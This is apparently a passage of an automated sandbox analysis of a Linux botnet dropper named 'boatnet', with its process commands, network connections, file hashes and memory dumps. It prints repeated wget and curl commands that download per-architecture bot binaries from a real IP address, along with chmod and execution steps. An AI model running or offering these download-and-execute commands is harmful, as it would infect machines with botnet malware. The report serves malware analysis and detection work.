[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.sh4]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

memory/1440-1-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1449-2-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1458-3-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1467-4-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1476-5-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1534-6-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1562-7-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1573-8-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1582-9-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1591-10-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1602-11-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1611-12-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1620-13-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1639-14-0x0000000008048000-0x000000000805ce08-memory.dmp